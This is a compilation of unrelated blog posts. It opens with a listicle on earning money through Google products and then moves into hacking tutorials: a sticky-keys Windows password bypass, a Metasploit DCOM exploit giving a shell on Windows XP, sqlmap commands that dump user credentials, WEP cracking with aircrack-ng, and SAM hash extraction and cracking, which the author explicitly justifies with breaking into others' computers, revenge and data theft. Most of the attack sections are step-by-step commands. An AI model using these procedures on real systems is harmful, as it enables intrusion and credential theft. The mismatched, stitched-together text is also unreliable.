11 Easiest way to earn money online

#1. Google Adsense

Adsense is the easiest way to start earning online with Google because you only need to start a blog or a website and get traffic to display ads so that users could click on the ads. Here are other ways to make money from your blog. 

There is no fixed Cost Per Click (CPC) for AdSense ads. In India, CPC varies from $0.01 to $0.10 but on an average, it is mostly around $0.03 depending on the niche.

However, I do not recommend monetizing using Adsense because first it drives the reader out of the blog and second there are better ways to monetize like affiliate marketing, email marketing and even selling e-books and courses.

#2. Google Adword (Ads)

Google Ads, a pay-per-click (PPC) advertising from Google can help you earn online by driving traffic to your website and let you sell the products. 

Google Ads requires knowledge of keywords, time and money. You can track and measure results.  Use Google Ads only when there are customer demand, a marketing budget, and an understanding of competition.

Understanding of the keywords is important as all the competition and bidding happens on specific business relevant keywords.

Before you start bidding on keywords, you should do primary research to know the worth of specific keywords, search volume, and keyword competitiveness.

You can use Google Ads to 

• To get visibility in the Google search results.
• Google Ads traffic might convert better than organic traffic
• Complement other marketing channels

#3. Run Google Adsense

The other way of using Google Adsense is to run your own ads on the Google Adsense network to pull targeted traffic to your website. Ad content will pull potential clients to your website. You can then monetize the traffic and earn money.

You need an initial investment to run ads campaign. 

Running Adsense requires expertise and investment which should justify the return on investment (ROI) obtained from pulling and monetizing traffic.

Go for this option, when you have the confidence to monetize your website through affiliate marketing or selling your own products. 

In order to run ads on different websites, you can also pick and add the site to your sites list in an AdSense account. 

You can use audience targeting tools like Facebook ads (data from page insights) & google ads (data from Google analytics demographics) to choose topics, interest categories, age, and gender to whom your ads will be shown or contextual targeting where you pick keywords and Google does the rest.

Once done, you need to bid for CPC (cost per click) for the targeted keywords. If you target high competitive words then CPC would go high. Because many people bid for those keywords.

#4. Youtube Adsense

Youtube was bought by Google in 2006 and now operates as one of Google’s subsidiaries.

Like Google Adsense, Youtube Adsense also works on similar lines. You create your own channel and then start publishing unique videos.

The Ads can be placed by linking your Youtube channel to the AdSense account so that you can monetize the videos.

My Cashoverflow Youtube Channel got monetization approval from Youtube and that too in just seven days after completing the eligibility criteria. 

For approving Adsense monetization, Youtube considers various factors such as  

• User Engagement: It requires 4000 watch hours and at least 1000 subscribers. 
• Quality Content: Without which getting engagement is not possible.  
• Copyrights: All the channel’s video should be original.
• Community Guidelines: To control banned or restricted content like child porn, drug or substance abuse.
• Advertisers: There should be some advertisers willing to place ads.

Based on the channel content, usually, it may take 15 days to 6 months to get approval.

While starting out, I suggest you create quality videos and upload them to build  engagement. You should be very regular in posting videos with original content and restraint from placing links and spamming. 

I got approval in a week’s time. 

#5. Youtube Adwords 

Youtube Adwords is for your videos which are similar to Google Adwords. But you need to remember that the Youtube channel attracts traffic only when you have high-quality relevant video content for your audience.

AdWords campaigns give extra momentum and boost the organic growth of your channel.

You can later choose one of two goals for your AdWords campaign  

• Brand Awareness and Reach: When you select Brand Awareness and Reach, your ad can reach a lot of people for a small amount of money, but it won’t appear in the search results. 

This goal is recommended for vloggers who are interested in making their channel popular and reach new viewers and subscribers.

• Product and Brand Consideration: Using this goal means your ad will appear in Youtube search results as people are researching or shopping for products. 

This goal is recommended for promoting a product, tool or service to desired  consumers.

#6. Run Youtube Adsense 

Just like Google Adsense, you can run Youtube Adsense to pull traffic to your Youtube channel. You can attract viewers from different channels with AdWords Placement Targeting. 

You can start by doing your own subscriber research to understand what channels and content creators your target audience subscribe to.  Next, you need to link your Youtube channel to Adwords account, create an Ad, set a budget and target the desired audience.  

The ads can be

• In-stream advertisements that appear before or after the video 
• In-display ads that appear alongside a video or on the Youtube search results page. 

Check out other methods of earning through Youtube.

#7. Participate in Google Surveys

Google surveys can be taken from Google’s opinion rewards app created by the Google Surveys team. 

However, the survey does not earn you huge money. In fact, it ranges from Rs. 3 to Rs. 20 per opinion. 

You can download the Google opinion reward app from google play store. Then you need to take surveys and give your opinion. For each opinion, you win Google Play credits which can be used to purchase Apps, Books, Online Music and Games from Play Store.

You can improve your chances of getting surveys by  

• Opening up the app every day
• Keeping your mobile’s GPRS on
• Sharing location history
• Traveling a lot
• Being honest and paying attention while taking a survey

#8. Start Blog and Drive Organic Traffic (SEO)

Google has the potential to send millions of organic traffic to your blog through SEO if you have meaningful and quality content.

SEO (Search Engine OPtimization) is the way to optimize content so that the content can be discovered easily by Google organic search. 

The SEO practices helps Google’s search algorithm understand what the content is all about so that Google can show the content to relevant readers.  

You can start earning by setting up a blog and driving organic traffic to the blog through proper SEO. You can monetize your blog later in different ways like affiliate marketing, Ad sense and offering your products and services. 

Getting organic traffic from Google is always beneficial as the audience have intent and the search matches with what exactly they are looking for. Which is helpful when it comes to generating income from advertisements and affiliate programs.

Even advertisers from brands look for the blog, which pulls organic traffic from search engines.

#9. List Your App on Google Play Store

You can build and list your own App on Google Play Store and earn money. 

Google also provides a cloud-based “App Engine platform” to build and publish apps on the Google Store. Initially, you can build free apps to check engagement and gain subscribers. Once you have enough subscribers, you can monetize your app.

Monetizing app can happen in the following ways

• Free App with In-app Advertising: In this model, you give away an app for free and make use of mobile in-app advertising to generate revenue. 

• Free App + In-app Purchases: In this model, you give away your app for free and make use of in-app purchases of virtual items to generate revenue. The items can be stickers, currency, weapons, extra lives, accessories.

• Paid Apps: The model requires you to pay for the app upfront in order to use it. You can build paid apps in categories like productivity, utility, education, and music. 

• Freemium model: Here you provide audiences a functional app that has basic features for free but needs to pay to access premium and more advanced features.

• Subscription: Subscription method generates revenues on a recurring basis i.e either monthly or annually. You allow viewing a predetermined amount of content for free and then ask for an upgrade or paid subscription to get more content.

• Incentivized Advertising: Here, you can reward audiences for completing an action such as clicking on an ad, watching a video ad, taking a survey, engaging with a brand and registering for a new product.

#10. Work as Search Engine Evaluator

You can earn money online working as a search engine evaluator. Google terms the position as “Ads quality rater” and it is one of the few online job opportunities with Google. 

The work involves examining and analyzing advertising content, images, and text and then give feedback on specific aspects of the ads.

Evaluators provide feedback to ensure that the search results are relevant, comprehensive, timely, are spam-free and accurate to the searcher’s intent. In short, they act as a human check to improve the complicated search engine algorithm.

However, Google does not recruit search engine evaluators directly but employs outside agencies like 

• Appen
• Leapfrog
• Lionbridge
• ZeroChaos

#11. Sell Books on Google Play Store

You can earn by publishing a book on Google Play through Books Partner Centre. 

Google Play helps you reach one billion+ android users spread over 50 countries and multiple platforms to promote your book.

If you have an existing ebook or planning to write a new book then you should definitely list it on Google Play. Google doesn’t even ask for exclusive rights to sell digital editions of your books. You do not even require ISBN at the start.

Bonus – Earn Money with Google Pay

Google Pay is a utility bill payment app that works with all existing bank accounts that support BHIM UPI. You can use Google Pay to make money for fun purposes because you can not scale and get regular earning.

You can earn through Google Pay in two ways

• Invite and Earn:  You invite your friends and others to use Google Pay and if your friends install the app from your link and make a transaction you will earn Rs. 51

• Earn through Scratch Cards: Google has designed lots of offers like “Transfer amount to anyone and you will get a scratch card up to Rs.1000.” But it needs a hard-luck to get some cashback from the scratch card.

Conclusion

You can earn a good amount of money and make your digital business success using Google tools. You can start by participating in Google Survey or referring to Google Pay, which does not require anything but to download the app. You will not earn much but will give you a start.

Hack Windows 10/8/7 Password with Password Reset USB

Command Prompt is indeed a reliable solution to hack Windows 10 password but takes two many steps and preparation to finally unlock the computer. Actually, you can remove the login password in 3 simple steps if you managed to create a Windows password reset USB. We will share the details in this part, which is 10X faster than using Command Prompt.

              

 

Step 1: Go and find another Windows PC with admin permission. Download and install Windows Password Recovery software and insert a USB drive into the device.

Step 2: On the software interface, you will see the USB drive name and click "Burn USB" option to create a Windows password reset USB. This takes around 5 minutes. Take out the USB and insert the USB to locked PC once burning is completed successfully.

Step 3: Boot the locked computer from USB and choose an user account you prefer to blank the password by clicking "Reset Password" button. After that, the password associated to that account was removed and you can login without password.

This is one of the most effective way to unlock a Windows PC without password. The password will be hacked instantly no matter how strong it is. So this is the recommended method for Windows password cracking.

              

Hack Windows 10/8/7 Password with Command Prompt (No Software)

The requirement for hacking Windows 10 password without software is much needed in two scenarios. If the Windows PC was locked because you have forgotten the password or bought an used computer but the seller did not tell you the password. In both the cases, you are not able to access the computer normally. So you need to look for ways to hack into the computer. Here are 3 ways shared in this post to hack Windows 10 password.

Command Prompt is a wonderful stock app in Windows and it is favored by system admin. You can do various task with this app with advanced text commands. Please follow the guidelines below to hack Windows 10 password without using any software.

Step 1: First, you need to create a bootable Windows USB on another PC.

Step 2: Insert that bootable device into the locked Windows PC. Select the troubleshooting option and go to the advanced section, by this method you will get to open the command prompt on your Windows PC.

Step 3: By default, the location is set as X drive, change the drive to c drive by typing C: and press enter button. After the drive is set to the system drive, enter the following command: C:\Windows\system32\sethc.exe C:\.

Step 4: Now enter the following command in the command prompt: C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe

Step 5: Reboot the computer and continuously press the shift key five times for opening the command prompt.

Step 6: In the command prompt box, type this command to reset a targe user password: net user user_name new_password.

Step 8: After the Windows PC restarts, you can access the PC without using any password.

HACK WINDOWS XP REMOTLY

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in this tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.

What are you going to need

Knowledge

• Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
• The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
• VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

Virtual Machines

• Kali linux ( Click the link for a complete detailed guide)
• Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)

Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one. I'm dead against piracy, and won't promote anything of that kind on my blog. Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit

service postgresql start

(Metasploit uses PostgreSQL as its database so it needs to be launched first.)

With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.

service metasploit start

Now finally we are ready to start metasploit framework.

msfconsole

Looking at the targets

Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan

To use this feature, enter the following code-

use auxiliary/scanner/portscan/tcp

Type show options to see the available options

show options

 Now we have to change a few settings, firstly, we should reduce the number of ports scanned

 set ports 1-500

Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type

ipconfig

In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.

In my case the IP is 192.168.63.131

Now go back to your Kali machine, and type the fol (change the IP as required)

set RHOST 192.168.63.131

Here's what it should look like

There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.

Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-

run

The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.

 

This basically means that there are no open ports here. Nothing much you can do. However if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the windows machine and run the auxiliary module again.

I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.

Real life port scan

In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.

search dcom

This is a very famous exploit for Windows.

 

Copy the exploit number 3. (Which shows great as rank). In the next line, type

use exploit/windows/dcerpc/ms03_026_dcom

You are now using the most famous Windows exploit. Type show options again

show options

Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)

set RHOST 192.168.63.131 

Also, set a payload.

set PAYLOAD windows/shell_bind_tcp

And here's the best part

exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.  Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.

Hacking Websites Using Sqlmap in Kali linux

Hacking Websites Using Sqlmap in Kali linux

first know about what is Sqlmap

Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."

A lot of features can be found on the SqlMap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySql. 

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.

The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-

• Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
• Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.

List of  a few common enumeration commands

So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).

The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

 Here's the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find more interesting vulnerable sites.

Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Wifi Hacking - WEP - Kali Linux Aircrack-ng suite

Alright, this post is written assuming you have Kali Linux up and running on your computer. If not, here is a post on kali linux how to download and install http://thegeniusworld.blogspot.in/2015/05/best-operaating-system-for-hackers.html. It will tell you about what Kali Linux is, and how to use it. It will guide you through installation process.
So if you are still following, then just follow these simple steps-

Firstly, create a wireless network to crack. Don't use this method on others. It is illegal. Then proceed with the steps below.

1. Find out the name of your wireless adapter.

Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-

• lo - loopback. Not important currently.
• eth - ethernet
• wlan - This is what we want. Note the suffix associated.

Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to  create a virtual interface called mon. Just type 

airmon-ng start wlan0

 Your mon0 interface will be created.

3. Start capturing packets

Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack.

airodump-ng mon0

4. Store the captured packets in a file 

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 --write name_of_file

Now the captured packets will be stored in name_of_file.cap
You have to wait till you have enough data (10000 minimum)

5. Crack the wifi

If all goes well ,then you'll be sitting in front of your pc, grinning, finally you've got 10000 packets (don't stop the packet capture yet). Now, you can use aircrack-ng to crack the password. (in a new terminal)

aircrack-ng name_of_file-01.cap 

The program will ask which wifi to crack, if there are multiple available. Choose the wifi. It'll do its job. If the password is weak enough, then you'll get it in front of you. If not, the program will tell you to get more packets. The program will retry again when there are 15000 packets, and so on.

Note : This will not work with WPA-2.i will tell you later about how to hack wpa/wpa-2 passwords.

HACK WINDOWS ADMIN

HACK WINDOWS ADMIN  FOR ALL OS:

Today, i am going to show you many aspects of the Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:
1) Sometime we have forgotten our old password and Hint isn't helping out.
2) We want to break into someone computer to get the information.
3) Just want to take revenge from someone.
4) Stealing computer data.

Lets, take a deep dive in Cracking Windows password and also where these are stored and in which format.

SAM file and Password Hashes~Place where these passwords are stored in Hashes:
Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:

                    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File. 

You can break this hash password from

www.md5hash.com

www.passcracking.ru

SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

Location of SAM/Hashes:

You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%system32config
 (i-e C:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)

So the two (Some other also) locations of the SAMHashes are:

- %systemroot%system32config

- In the registry under HKEY_LOCAL_MACHINESAMCracking or Breaking Into Admin Account:


How to get Hashes form SAM file?

Well, Below are the methods to do so:

1) Well, the easiest way to do this is to boot your target machine to an alternate OS like NTFSDOS or Linux and just copy the SAM from the %systemroot%system32config  folder. 

It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals(http://www.sysinternals.com) The regular version of NTFSDOS is freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google It to get software ~ Search at openwall.com). pwdump uses .DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then  paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used.

3) Import Hashes directly from l0phtcrack, and let them open to you by cracking.


Obtained Hashes? Now crack them:

Well, as i have said that these can't be reversed but somehow automated famous cracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.

1) John the Ripper - John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of all it's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.
 

---

Another Easy method, Using  ophcrack to Hack into Admin Account:

Ophcrack  is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

This is a type of offline cracking, Just grab .iso of ophcrack from  here. Burn it and enjoy using.

1.  Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.

2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any  14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.

3.  Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.

4.  The Ophcrack LiveCD option allows for completely automatic password recovery.

5.  LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.

6.  No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.

Download

I think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.

Some security Tips ~ Making strong passwords:

Now, You might have come to know that how passwords can be cracked, So there are some tips for you.

1) Do not make common passwords like 123456 or the one of your own name.

2) Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.

3) Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.

Hide File In Image

Hide File In Image

HOw Can We Hide The File In Image. 1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder -The image will hereby be referred to in all examples as xyz.jpg -The file will hereby be referred to in all examples as New Text Document.txt 2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar) 3. Open command prompt by going to Start > Run > cmd 4. In Command Prompt, navigate to the folder where your two files are by typing cd location [ex: cd C:\New Folder] 5. Type [copy /b xyz.jpg + secret.rar xyz.jpg] (remove the brackets) Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file. In order to view/extract your file, there are two options that you can take a) Change the file extension from xyz.jpg to xyz.rar, then open and your file is there b) Leave the file extension as is, right click, open with WinRar and your file is there EnJoy HacKinG...

RECOVER DELETED DATA

Recover Deleted Files

Recover My Files

Recover My Files data recovery software will recover deleted files emptied from the Windows Recycle Bin, or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.

Recover My Files - Data Recovery Software	Solution
Recover files even if emptied from the Recycle Bin
File recovery after accidental format, even if you have reinstalled Windows.
Disk recovery after a hard disk crash
Get back files after a partitioning error
Get data back from RAW hard drives
Recover documents, photos, video music and email.
Recover from hard drive, camera card, USB, Zip, floppy disk or other media

Data Recovery Software Download
Current Version: 4.6.8.1012